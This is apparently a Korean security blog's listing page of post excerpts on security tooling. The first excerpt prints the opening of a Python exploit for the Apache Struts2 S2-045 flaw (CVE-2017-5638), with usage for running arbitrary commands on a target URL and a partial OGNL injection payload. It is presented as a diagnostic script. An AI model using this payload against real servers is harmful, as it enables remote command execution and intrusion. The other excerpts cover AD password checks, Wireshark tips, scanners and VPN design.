보안 툴킷

중국이 공격하는 Struts2 취약점(CVE 2017-5638 – Apache Struts2 S2-045) 진단 스크립트(Python)

(*) 출처: https://github.com/rapid7/metasploit-framework/issues/8064 * usage: $python struts2_S2-045.py <URL> <CMD> $python struts2_S2-045.py http://127.0.0.1:8080/2.3.15.1-showcase/showcase.action “ls -al” [ struts2_S2-045.py – Python Code ] #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = “%{(#_=’multipart/form-data’).” payload += “(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).” payload += “(#_memberAccess?” payload += “(#_memberAccess=#dm):” payload += “((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).” payload += “(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).” payload += “(#ognlUtil.getExcludedPackageNames().clear()).” payload += […]

중국이 공격하는 Struts2 취약점(CVE 2017-5638 – Apache Struts2 S2-045) 진단 스크립트(Python) 더 읽기"

Active Directory bad password 계정진단 Script(Powershell)

– Active Directory는 조직내의 자원에 대한 접근통제를 위해 기업이나 기관의 규모와 상관없이 많이 사용되고 있습니다.– 그러나 Active Directory의 서비스 특성을 고려한 보안진단을 하는 곳은 아직까지 드문것으로 보입니다.– Active Directory 보안진단의 중요 포인트는 Domain Controller, Group Policy, User Account, Event Log 등이 있습니다.– 최근 글로벌 조직의 Active Directory를 운영하는 고객사에 대한 취약점 진단에는 Ad User 계정을

Active Directory bad password 계정진단 Script(Powershell) 더 읽기"

어플리케이션 소스코드 취약점 진단시 전용툴과 함께 사용할 유용한 툴

대부분의 어플리케이션 소스 취약점 진단작업은 다량의 소스파일을 받아 취약점 진단을 수행하게 된다.Fortify와 같은 소스 취약점진단 전용 툴을 이용하는 정적진단과 전문 컨설턴트의 동적 수작업 진단을 병행하는것이 대부분이다.이런 상황에서 수작업 진단시 많은 양의 소스들을 육안으로 확인하는 것은 상당히 어렵기 때문에 몇 가지 유용한 도구들을 활용하는 것이 일반적이다. 1. 문자열 검색 툴 많은 파일들 중에서 특정 문자열을 검색해주는

어플리케이션 소스코드 취약점 진단시 전용툴과 함께 사용할 유용한 툴 더 읽기"

취약점 진단시 꼭 필요한 Wireshark의 꿀팁

Packet의 Time 표시설정 변경하기 (메뉴: View > Time Display Format) Packet Flow보기 (메뉴: Statistics > Flow Graph) 특정 호스트간의 Packet 송수신 조회 (메뉴: Statistics > Conversations) Packet Flow보기 (메뉴: Statistics > Endpoints) 특정 문자열이 있는 Packet 검색하기 (메뉴: Edit > Find Packet, Ctrl+F)

취약점 진단시 꼭 필요한 Wireshark의 꿀팁 더 읽기"

Wapiti

Wapiti allows you to audit the security of your web applications.It performs “black-box” scans, i.e. it does not study the source code of the application but will scans the webpages of the deployed webapp, looking for scripts and forms where it can inject data.Once it gets this list, Wapiti acts like a fuzzer, injecting payloads

Wapiti 더 읽기"

PHP Security Audit

php_aduit_script.php <?php   /** * PHP Security Check Script * http://php-security-audit.com/ * * This security check script will evaluate the PHP runtime environment * for your configuration to determine whether any improvements could be * made to your configuration. * * * * * * * * * * Revision History * * 2009-05-08 –

PHP Security Audit 더 읽기"

안전한 정보통신 환경 구현을 위한 네트워크 구축 가이드라인

해당 문서는 국가보안기술연구소에 저작권이있으며,이 pdf 파일을 홈페이지에 게재하고, 누구나 다운로드 받을 수 있도록 하는 행위는국가 보안저작권의 복제권, 전송권 등을 침해하는 행위라는 공문을 받았습니다.이에 해당 문서의 게재를 중단하고 삭제 처리하였습니다.

안전한 정보통신 환경 구현을 위한 네트워크 구축 가이드라인 더 읽기"

VPN Security Architecture (작성중)

VPN 개요 VPN(Virtual Private Network)는 공중망상에 사설망을 구축하여 이용자가 마치 자기의 사설 구내망 또는 전용망같이 이용할 수 있게하는 네트워크 서비스다. *위와 같은 보안 위협에 대해 아래와 같은 보안 아키텍처로 대응해야 한다. VPN 보안 아키텍처 Site to Site VPN 보안 가이드 완화된 보안위협 인터넷단 Router와 VPN Router의 적합한 설정 -인터넷 접점라우터를 통해 1차 필터링: 외부로부터 특정

VPN Security Architecture (작성중) 더 읽기"